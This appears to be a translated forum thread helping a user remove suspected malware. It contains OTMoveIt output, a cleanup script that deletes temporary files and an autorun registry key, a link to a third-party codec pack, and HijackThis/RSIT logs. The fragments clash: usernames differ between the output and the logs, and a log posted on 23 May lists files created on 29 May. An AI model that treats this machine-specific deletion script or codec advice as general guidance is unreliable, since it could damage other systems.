C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\cache4\opr07CG2 moved successfully.


Sat May 23, 2009 20:05
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, which is why what you see looks like this,
Post
Download the OTMOVEIT3 program, paste the red text into the left-hand pane and click MoveIt; after the restart, post here what it gives you, and
http://download.bleepingcomputer.com/ol ... oveIt3.exe

install codecs for the WMP player.
http://www.pakblogger.com/windows-media-player-2009-codec-pack-play-all-media-formats-in-wmp/

Code:
:processes
explorer.exe

:files
C:\WINDOWS\system32\*.tmp.dll /s
C:\WINDOWS\system32\SET*.tmp /s
C:\WINDOWS\*.tmp /s
C:\WINDOWS\system32\h323log.txt

:reg
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}]

:commands
[purity]
[emptytemp]
[start explorer]
[Reboot]


Sat May 23, 2009 16:12
silver member

Joined: Thu Jun 21, 2007 10:27
Posts: 92
Post
OK, I ran it again and there is an info.txt too!

log.txt:
Logfile of random's system information tool 1.06 (written by random/random)
Run by Zsombor at 2009-05-23 14:29:10
Microsoft Windows XP Home Edition Szervizcsomag 3
System drive C: has 68 GB (45%) free of 153 GB
Total RAM: 3070 MB (84% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 14:29:24, on 2009.05.23.
Platform: Windows XP Szervizcsomag 3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_1_3_0\RGSC.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Documents and Settings\Zsombor\Asztal\RSIT.exe
C:\Program Files\trend micro\Zsombor.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: ZoneAlarm Spy Blocker BHO - {F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: ZoneAlarm Spy Blocker - {F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [RGSC] C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xportálás Microsoft Excel formátumba - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 0564585359
O17 - HKLM\System\CCS\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{2CAFB75C-3D71-4682-9C89-26CBA55E1E2C}: NameServer = 192.168.1.1
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GtDetectSc - Option - C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Ahead Software AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: KF Web Server (KeyFocusWebServer) - Unknown owner - C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
O23 - Service: MSCSPTISRV - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: Pinnacle Systems Media Service (PinnacleSys.MediaServer) - Pinnacle Systems - C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe
O23 - Service: Fujitsu Siemens Computers Diagnostic Testhandler (TestHandler) - Fujitsu Siemens Computers - C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

--
End of file - 8738 bytes

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2009-01-13 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
Adobe PDF Conversion Toolbar Helper - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-01-13 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-01-13 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA}]
ZoneAlarm Spy Blocker BHO - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - ZoneAlarm Spy Blocker - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL [2008-12-29 262144]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2006-10-23 321120]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"nwiz"=nwiz.exe /install []
"ZoneAlarm Client"=C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe [2008-08-21 981904]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2006-06-28 16248320]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-12-03 13680640]
"egui"=C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2008-10-24 1451264]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]
"RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe [2008-12-29 306088]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2007-10-18 5724184]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\InCD]
C:\Program Files\Ahead\InCD\InCD.exe [2004-02-10 1261672]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
C:\Program Files\Messenger\msmsgs.exe [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
C:\Program Files\QuickTime\qttask.exe [2007-10-19 286720]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2006-05-23 402736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]
UPnPMonitor - {e57ce738-33e8-4c51-8354-bb4de9d215d1} - C:\WINDOWS\system32\upnpui.dll [2008-04-14 239616]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\vsmon]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe"="C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe:*:Enabled:Rockstar Games Social Club"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Totalcmd\TOTALCMD.EXE"="C:\Program Files\Totalcmd\TOTALCMD.EXE:*:Enabled:Total Commander 32 bit international version, file manager replacement for Windows"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"
"C:\WINDOWS\system32\spoolsv.exe"="C:\WINDOWS\system32\spoolsv.exe:*:Enabled:Spooler SubSystem App"
"C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe:*:Enabled:hpofxm08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe"="C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe:*:Enabled:hposfx08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe"="C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe:*:Enabled:hpqscnvw.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe:*:Enabled:hpqcopy.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe:*:Enabled:hpzwiz01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe:*:Enabled:hpqnrs08.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMC.exe"="C:\Program Files\Pinnacle\MediaCenter\PMC.exe:LocalSubNet:Enabled:Pmc.exe"
"C:\Program Files\Pinnacle\MediaCenter\PSST.exe"="C:\Program Files\Pinnacle\MediaCenter\PSST.exe:LocalSubNet:Enabled:PSST.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe"="C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe:LocalSubNet:Enabled:PMSManager.exe"
"C:\Program Files\uTorrent\uTorrent.exe"="C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent"
"C:\WINDOWS\system32\PnkBstrA.exe"="C:\WINDOWS\system32\PnkBstrA.exe:*:Enabled:PnkBstrA"
"C:\WINDOWS\system32\PnkBstrB.exe"="C:\WINDOWS\system32\PnkBstrB.exe:*:Enabled:PnkBstrB"
"C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe"="C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe:*:Enabled:Call of Duty(R) 4 - Modern Warfare(TM) "
"C:\Program Files\Messenger\msmsgs.exe"="C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger"
"C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe"="C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe:*:Enabled:Sony Ericsson Media Manager 1.1"
"C:\Program Files\LimeWire\LimeWire.exe"="C:\Program Files\LimeWire\LimeWire.exe:*:Enabled:LimeWire"
"C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe"="C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe:*:Enabled:kfwserv"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe:LocalSubNet:Disabled:PMCService"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}]
shell\AutoRun\command - J:\setup.exe AUTORUN=1


======List of files/folders created in the last 1 months======

2009-05-29 12:37:36 ----A---- C:\WINDOWS\system32\h323log.txt
2009-05-29 12:33:50 ----A---- C:\WINDOWS\system32\hidserv.dll
2009-05-29 12:33:22 ----A---- C:\WINDOWS\system32\ksuser.dll
2009-05-29 12:32:09 ----A---- C:\WINDOWS\system32\usbui.dll
2009-05-29 12:31:03 ----SHD---- C:\WINDOWS\Installer
2009-05-29 12:31:03 ----D---- C:\Program Files\Common Files\ODBC
2009-05-29 12:31:03 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-05-29 12:31:03 ----A---- C:\WINDOWS\ODBCINST.INI
2009-05-29 12:30:57 ----D---- C:\Program Files\Common Files\SpeechEngines
2009-05-29 12:30:56 ----RD---- C:\Program Files
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuq.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuf.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdazel.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbduzb.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdtat.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdmon.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkyr.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkaz.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdaze.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdycc.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdur.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru1.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdbu.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdblr.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhept.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela3.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela2.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe319.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe220.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdgkl.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlv1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdlv.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdest.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl1.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdycl.dll
